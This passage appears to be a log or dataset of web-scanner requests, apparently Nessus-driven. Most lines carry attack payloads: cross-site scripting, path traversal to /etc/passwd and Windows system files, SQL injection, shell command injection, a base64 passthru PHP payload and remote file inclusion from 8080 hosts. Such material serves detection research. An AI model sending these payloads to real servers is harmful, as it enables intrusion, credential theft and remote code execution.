meta http-equiv=set-cookie content=\"testwhac=3130\">\n/scripts/index.php?board=nonexistant1519026211\n/u8yiqilu.aspx?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/_vti_bin/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/top.php?stuff=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1&rem\\xa0\n/cgi-bin/sendpage.pl?message=test\\;/bin/ls /etc;echo \\message\n/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/8x6w469u.idc?<script>document.cookie=\"testgfjr=1286;\"</script>\n/fpnpp5zg.fts?<meta http-equiv=set-cookie content=\"testyias=101\">\n/3j8echh0.jsp?<script>document.cookie=\"testfuqi=4189;\"</script>\n/scripts/login.action\n/n9xlumt5.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/floralsubscription/\n/javascript/geronimo.exe\n/passwd2/\n/?<script>document.cookie=\"testzgnm=1183;\"</script>\n/en-us/odzk29aa.cfc?<script>document.cookie=\"testtfvh=2141;\"</script>\n//document.writeln(unescape(\"%3cscript src=%27http://www.example.com/test?rnd=q86275278%27><\"+string.fromcharcode(0x2f)+\"script>\"))\n/nyjgaorz.cfc?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"del q61955456&rem \n/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=\\xcartid%&file=;cat /etc/passwd|\n/examples/jsp/error/faxsurvey?cat /etc/passwd\n/top.php?stuff=\"uname >q95826835 #\n/m2fpztty.mscgi?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/vmi8bb12.do?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/webcgi/.htpasswd\n/manager/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/v3axg1p8.cfm?<script>document.cookie=\"testxagh=6987;\"</script>\n/examples/servlets/servlet/search.php?submit=true&search=');\n/0rufe52p.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bl8sefdm.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/odzk29aa.pl?<script>document.cookie=\"testtfvh=2141;\"</script>\n/examples/jsp/sessions/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/en-us/33y9gcqq.do?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/scripts/prnnucptkixl.sh\n/javascript/retail.exe\n/script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/6wb70v0b.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/i686v90l.asp?<script>document.cookie=\"testfutf=1550;\"</script>\n/bl8sefdm.cfm?<script>cross_site_scripting.nasl</script>\n/cgi/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/javascript/iissamples.exe\n/um7xpn15.idc?<script>document.cookie=\"testotoy=6142;\"</script>\n/newsarchive.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls\n/search.jsp?q=%\"<script>alert(1331918998)</script>\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=@rfiurl\n/main.php?stuff=ping;-w;10000;-n;1;1.2.3.4|rem;\n/vhzmaia2.kspx?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc\n/cgi-bin/www/delivery/ac.php?bannerid=-1331908694+or+1=1+--+';passthru(base64_decode($_server[http_nessus_nagbw8sx]));die;/*\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=q82549354&scr_width=\n/help.php?q=';uname\\x09>q61196872\\x09#\n/ywaxntrx.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n9xlumt5.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/psynch/nph-psa.exe?css=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/jscript-r0/\n/meijer01scripting/\n/barlowe's_inferno/\n/dslpwt15.kspx?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/htbin/msmmask.exe?mask=/junk334\n/egaet53a.asp?<script>cross_site_scripting.nasl</script>\n/javascript/access.exe\n/examples/jsp/checkbox/htmlscript?../../../../../../../../../etc/passwd\n/javascript/document.cfm\n/en-us/account/webplus.exe?script=webplus_install_path.nasl\n/scripts/wd7crx47eaml.pl\n/recordings/index.php?cat='\n/n1afe1y6.fts?<script>cross_site_scripting.nasl</script>\n/javascript/effort.exe\n/javascript/pem.exe\n/examples/jsp/num/index.php?templates_dir=/etc/passwd\\x00\n/33y9gcqq.nsf?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/cgi-sys/fileseek2.cgi?foot=;cat /etc/passwd&head=\n//./../../../../../../../.etc/passwd\n/raanw4ia.x?<script>cross_site_scripting.nasl</script>\n/search.php?mailbox=inbox&what=x&where=<script>alert('vulnerable!')</script>&submit=search\n/javascript/legal.exe\n/cgi-bin/fom.cgi?file=<script>alert('vulnerable')</script>\n/script/index.php?path_inc=http://cirt.net/rfiinc.txt?\n/javascript/shopper.exe\n/fcgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/if69ddo1.fts?<script>document.cookie=\"testiabz=5220;\"</script>\n/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls\n/_vti_bin/cgimail.exe\n/examples/jsp/jsp2/jspx/webdist.cgi?distloc=;id\n/jdx255ea.do?<script>document.cookie=\"testziyq=5055;\"</script>\n/scripts/index.php?title=special:version\n/en-us/9kr0ih0v.asp?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/cactifaq.php?skin=../../admin/manager&tplpath=admin\n/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/cgi-win/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/scripts/vvh_tajyleqq.pl\n/scripts/search.jsp?q=%\"<script>alert(1331904373)</script>\n/igtf0zon.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/staticpages.exe\n/static//.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd\n/javascript/test1.exe\n/examples/jsp/num/index.php?id=0rop9yeuxw'\n/examples/jsp/jsp2/el/remindpasswd\n/pbserver/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/ows-bin/sensepost.exe?/c+dir\n/top.php?stuff=\"ping -w 8000 -n 1 4.3.2.1&rem \n/scripts/activeauctionsuperstore/iteminfo.asp?itemid=42'\n/subscriptions.o\n/top.php?stuff=\"&del\\xa0q83547895&rem\\xa0\n/recordings/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/javascript/htpasswd.properties\n/main.php?stuff=ver,>q88957187&rem,\n/examples/jsp/num/cal_week.php?op=week&catview=999'\n/zqqemp6j.exe?<script>cross_site_scripting.nasl</script>\n/eg2u8pbv.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/htgrep/file=index.html&hdr=/etc/passwd\n/scs86g1p.cgi?<script>document.cookie=\"testquyx=2820;\"</script>\n/examples/jsp/sessions/athenareg.php?pass= ;id\n/wholphinsubscriptionbeginningwithno2/\n/examples/jsp/jsp2/jspx/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/g8nu2yy7.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping;-w;9000;-n;1;1.2.3.4&rem;\n/main.inc.php?pathtoscript=http://192.168.202.118:8080/zz5thkvtmlgl?\n/title_featurescripts/\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.php3\n/javascript/document.nsf\n/scripts/c0kha6w3apd3.asp\n/javascript/master.exe\n/vwmg565s.kspx?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|ping -w 7000 -n 1 1.2.3.4|rem \n/phpmyadmin/index.php?id=0rop9yeuxw'\n/snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/examples/jsp/cal/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/javascript/albums.exe\n/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../../../../winnt/win.ini\n/scripts/b0j2ijssh6cu.asp\n/nyvbv05h.aspx?<script>document.cookie=\"testftxz=5980;\"</script>\n/cgi-bin/misc/audio.php?recording=../version.inc\n/info.php?id=411905577608&return_=3444444445'\n/top.php?stuff=\";del\\x09q35965763\\x09#\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/9ko6m4c8.idc?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/help.php?q=\"&del\\x09q13543643\\x09#\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331908897.php.\n/en-us/i686v90l.x?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/javascript/k.exe\n/scripts/wx4z4gedhl0l.inc\n/main.php?stuff=ver\\x0c>q62962642&rem\\x0c\n/6wb70v0b.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6dlc2zm9.cfm?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/javascript/b.exe\n/examples/jsp/jsp2/el/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/phpmyadmin/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/javascript/document.rss\n/scripts/member.php?action=login\n/nyvbv05h.php3?<script>document.cookie=\"testftxz=5980;\"</script>\n/v3axg1p8.php3?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/javascript/declaration.exe\n/7u1pb2xi.x?<script>document.cookie=\"testlwwz=718;\"</script>\n/cgi-bin/wguest.exe\n/cacti/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/0w155a7c.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/i686v90l.jspa?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/cgi-bin/phpnews/sendtofriend.php?mid='1'\n/javascript/nc.exe\n/examples/jsp/error/search.php?submit=true&search=');\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.htm\n/javascript/iso.exe\n/i686v90l.x?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/scripts/gbadmin.cgi?action=setup\n/javascript/policies.exe\n/admin/index.php?path_to_script=http://192.168.202.96:8080/llumt7msyau5y??&cmd=ls\n/examples/jsp/jsp2/jspx/detail.asp?nchannel='1\n/tuwjta1w.asp?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/index.php?query=<script>alert(412005577635)</script>&type=advanced&results=20&searchtype=2\n/scriptheader2/\n/aoy7kzbh.exe\n/phpmyadmin/protection.php?action=logout&siteurl=/etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+40+30+00+00+34+30+00+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq\n/phptonuke.php?filnavn=<script>alert('vulnerable')</script>\n/examples/jsp/jsp2/el/more.php?id=1'\n/modules.php?op=modload&name=faq&file=index&myfaq=yes&id_cat=1&categories=<img src=javascript:alert(9456);>&parent_id=0\n/jujgxwav.php3?<script>document.cookie=\"testknim=9383;\"</script>\n/katamari damacy soundtrack 'katamari fortissimo damacy'/\n/fc9t54l7.jspa?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/t578vqea.jsp?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/riskmodeldescription/\n/o1zj4u9v.mscgi?<script>document.cookie=\"testabrn=6368;\"</script>\n/iv5vkgam.fts?<script>document.cookie=\"testfosd=94;\"</script>\n/main.php?logout='\\x0ddel\\x09q42114986\\x09#\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+4d+5a+50+00+02+00+00+00+04+00+0f+00+ff+ff+00+00+b8+00+00+00+00+00+00+00+40++>>ctdn\n/examples/jsp/jsp2/el/index.php?id='union/**/select/**/0,0,869732329,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/eg2u8pbv.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=;rm\\x09q16377967\\x09#\n/phpmyadmin/documentation.html?phpmyadmin=||cat /etc/passwd\n/javascript/business.exe\n/rpxyx07v.mscgi?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/g3w7y7u5.dll?<script>document.cookie=\"testbfpq=3326;\"</script>\n/cgi-local/cgi-test.exe\n/examples/servlets/servlet/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/ydexw8by.jspa?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/ezhttpbench.php?analysesite=/etc/passwd&numloops=1\n/d44uk9h2.nsf?<meta http-equiv=set-cookie content=\"testmybc=2088\">\n/help.php?q='&rm q67988136 #\n/../../../../../../winnt/repair/sam._\n/includes/tellafriend.php?about=game&gamename=<script>alert(411695577533);</script>\n/9kr0ih0v.asp?<script>document.cookie=\"testzgnm=1183;\"</script>\n/cacti/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/forgotpasswd/\n/scripts/port.php?proto=tcp'\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1461801666,2,718923871,4,5,6,7,8,9,0,1,2,3 --\n/u8yiqilu.fts?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/help.php?q='del\\x09q87915929\\x09#\n/phpmyadmin/faxsurvey?cat /etc/passwd\n/scripts/doku.php\n/x7pclv4s.cfc?<script>document.cookie=\"testiulz=3709;\"</script>\n/_vti_bin/shtml.exe/_vti_rpc?method=server+version:4.0.2.2611\n/examples/jsp/cal/embed/day.php?path=/etc/passwd\\x00\n/raanw4ia.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/l4fz1dqw.idc?<script>cross_site_scripting.nasl</script>\n/manuscript/\n/examples/servlets/servlet/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/bmeun223.dll?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/scripts/axdgpyi2bn6f.asp\n/cgi-local/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/mpcgi/msmmask.exe?mask=/junk334\n/examples/jsp/cal/athenareg.php?pass= ;id\n/examples/jsp/num/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/prescription-carisoprodol/\n/javascript/fb.exe\n/examples/jsp/jsp2/jspx/index.php?cat_select=<script>foo</script>\n/javascript/word.exe\n/en-us/account/kb.cgi?view='&lang=en\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/en-us/account/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/?<script>document.cookie=\"testqpux=4016;\"</script>\n/?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/cacti/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/zqqemp6j.jspa?<script>cross_site_scripting.nasl</script>\n/en-us/account/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/boorp's/\n/bin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/phpmyadmin/base_qry_common.php?base_path=/etc/passwd\\x00\n/recordings/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/m5103snj.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d765w06j.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/config.php?path[docroot]=/etc/passwd\\x00\n/fpnpp5zg.nsf?<meta http-equiv=set-cookie content=\"testyias=101\">\n/recordings/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/don't let daddy know/\n/pfdispaly?../../../../../../etc/passwd\n/cgibin/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/scripts/fileseek.cgi?foot=;cat /etc/passwd&head=\n/b4vng02k.idc?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/recordings/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/javascript/loc.exe\n/odzk29aa.jspa?<script>document.cookie=\"testtfvh=2141;\"</script>\n/examples/jsp/cal/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/javascript/partners.exe\n/phpmyadmin/documentation.html?bad_bad_value'=1\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010411\n/firewall/policy/dlg?q=-1&fzone=t<script>alert('vulnerable')</script>>&tzone=dmz\n/17_morecscript/\n/scripts/tinfo.php?id=1332008327\n/examples/jsp/jsp2/el/bb-hist.sh?histfile=../../../../../etc/passwd\n/t578vqea.php3?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/examples/jsp/cal/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1\n/9o6g5vkn.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vwmg565s.jspa?<script>cross_site_scripting.nasl</script>\n/egaet53a.php3?<script>cross_site_scripting.nasl</script>\n/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/vac1l5vm.asp?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/wiki.php/<script>foo</script>\n/manager/ftp/ftp.pl?dir=../../../../../../etc\n/subscriptions.so\n/phil collins - don't lose my number by cypher [cvap]/\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/main.php?stuff=\"ping;-w;9000;-n;1;4.3.2.1&rem;\n/0w155a7c.nsf?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=+adw-script+ad4-alert(202)+adw-/script+ad4-\n/description-valium/\n/help.php?q=\"ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/examples/jsp/sessions/search.jsp?q=%\"<script>alert(1331904373)</script>\n/hrttz9fj.cfc?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/nuh3zirz.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\\x00\n/fc9t54l7.php3?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.aspx\n/en-us/jnv890lt.php?<script>cross_site_scripting.nasl</script>\n/aj3pf49c.cgi?<script>document.cookie=\"testnofv=4170;\"</script>\n/examples/jsp/checkbox/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/3j8echh0.asp?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/82q7ywa8.aspx?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/help.php?q=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/help.php?q='|sleep\\x099\\x09#\n/9o6g5vkn.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/audit.exe\n/cgi-915/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/viewers/txt.php?filename=../../../../../../../../../../etc/passwd\\x00\n/scripts/qcvjnagy16kc.cgi\n/azcrfs8d.jsp?<script>document.cookie=\"testjpdr=9205;\"</script>\n/javascript/dir-prop-base.exe\n/examples/jsp/num/a1disp3.cgi?/../../../../../../etc/passwd\n/javascript/prepaid.exe\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/bzuf9ozq.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/esmozg5d.pl?<script>cross_site_scripting.nasl</script>\n/script/ident/identification.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/phpmyadmin/sawmill6cl.exe?ho+{complete_version}\n/zv8tv7h8.cfm?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/top.php?stuff=\\x0duname >q54622814 #\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331919202\n/pxagj7n7.jspa?<script>cross_site_scripting.nasl</script>\n/saviotranscript/\n/ap58k3ci.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pxagj7n7.x?<script>cross_site_scripting.nasl</script>\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/ipb5ri??&cmd=id\n/en-us/account/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/en-us/account/protection.php?action=logout&siteurl=/etc/passwd\n/cgi-exe/gwweb.exe?help=bad-request\n/examples/jsp/checkbox/admin/top.php?admindir=/etc/passwd\\x00\n/scripts/n4p4f4gtbhia.inc\n/javascript/important.exe\n/recordings/index.php?site=../../../../../../../../etc/passwd\\x00\n/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/ghl9il??\n/subscriptions.conf\n/9kr0ih0v.cfm?<script>document.cookie=\"testzgnm=1183;\"</script>\n/nyvbv05h.kspx?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0\n/examples/jsp/sessions/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\"&ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/en-us/h5sc3gxy.fts?<script>cross_site_scripting.nasl</script>\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/swgnhpydbq0t?&\n/scripts/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/scripts/index.php?edit=nonexistant138490642\n/3m5knyc4.pl?<script>document.cookie=\"testbgqj=6434;\"</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+5e+30+00+00+00+00+00+00+4b+45+52+4e+45+4c+33+32+2e+64+6c+6c+00+00+00+00+4c++>>esbq\n/r3le3om5.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/xsl.exe\n/examples/jsp/colors/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd\n/main.php?stuff='rm\\x09q85216432\\x09#\n/main.php?stuff=\"del q22289594 #\n/cgi-bin/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/phpmyadmin/index.php?p='nessus\n/cgi-bin/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/main.php?stuff='\\x0adel\\x09q47233887\\x09#\n/weq93ppb.html?<script>cross_site_scripting.nasl</script>\n/modules/forums/bb_smilies.php?name=<script>alert('vulnerable')</script>\n/7u1pb2xi.asp?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/subscriptions_contacts/\n/<script>cross_site_scripting.nasl</script>.kspx\n/top.php?stuff=\"&sleep\\x0910\\x09#\n/iajtej82.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/search_result.asp?category=all&keyword=sql_error411826083446'&mode=date\n/qb2xy9aw.cfm?<script>cross_site_scripting.nasl</script>\n/bxnyrhmh.nsf?<script>document.cookie=\"testmjct=1867;\"</script>\n/top.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/scripts/qbch5ojumj32.html\n/egaet53a.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ping,-w,9000,-n,1,1.2.3.4&rem,\n/scripts/lpzj75ztw9lb.php\n/examples/jsp/cal/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/pachelbel's_canon/\n/examples/jsp/calsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/main.php?stuff=\"&ping,-w,10000,-n,1,4.3.2.1&rem,\n/vac1l5vm.idc?<script>cross_site_scripting.nasl</script>\n/fcgi-bin/ppdscgi.exe\n/tukodz3j.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?mode=administration\n/subscriptions.bz2\n/en-us/i686v90l.htm?<script>document.cookie=\"testfutf=1550;\"</script>\n/javascript/htpasswd.msg\n/javascript/star.exe\n/scripts/nffhikq061nq.html\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/2aibfaczmac8?\\x00\n/main.php?logout=\"\\x0arm\\x09q98198938\\x09#\n/scripts/includes/calendar.php?phpc_root_path=http://xxxx./\n/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>\n/8t9v8k7x.asp?<script>document.cookie=\"testhvje=9403;\"</script>\n/help.php?q=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/javascript/viewtopic.exe\n/raanw4ia.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/survey.inc.php?path=/etc/passwd\\x00\n/cgi-exe/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/main.php?stuff=\"\\x0drm\\x09q25635537\\x09#\n/help.php?q=\"rm\\x09q46669995\\x09#\n/quagynka.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx?username=\"<script>foo</script\n/i7prbs22.nsf?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/top.php?stuff=';del\\x09q65186773\\x09#\n/cgi-bin/file.php?path=/etc/passwd\\x00\n/cgi-bin/browse_item_details.asp?item_id='webstores_browseitemdetails_sql_injection.nasl\n/qb2xy9aw.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini\\x00\n/acart2_0/error.asp?msg=<script>alert(\\\"test\\\")</script>\n/b5xdqgz2.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+20+72+75+6e+20+69+6e+20+44+4f+53+20+6d+6f+64+65+24+00+00+00+00+00+00+00+00++>>ctdn\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904231,1,1,1,1,1,1,1--&blogid=1\n/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd\\x00&amp;page=1\n/en-us/account/index.php?configfile=../../../../../../../../../etc/passwd\n/examples/jsp/colors/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/gepi/gestion/savebackup.php?filename=http://192.168.202.96:8080/4dckqcc0acprbz?&cmd=cat/etc/passwd\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>\n/help.php?q=\";sleep\\x0910\\x09#\n/javascript/www-sql.exe\n/en-description/\n/javascript/document.csv\n/vjbrrppi.mscgi?<script>cross_site_scripting.nasl</script>\n/l13b77e5.kspx?<script>document.cookie=\"testjvvf=7721;\"</script>\n/ddoworrl.do?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/scripts/cevvxrxqxc_b.sh\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/ysooqnjtxq0;echo|awstats607059.txt\n/7dbjwpw6.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/phpnews/sendtofriend.php?mid='1'\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331909400\")</script>\n/dir_thatware/config.php?root_path=@rfiurl'\n/?<script>document.cookie=\"testtbjy=7334;\"</script>\n/cgi-bin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/phpmyadmin/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_j63eevk_]));die;/*\n/nmw0do67.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/secret.exe\n/bzuf9ozq.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t3af3tdz.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/cgi-bin/cgitest.exe\n/aboutsubscription/\n/forum-ra_professionnel.asp?n=/etc/passwd\\x00\n/bn857frh.asp?<img 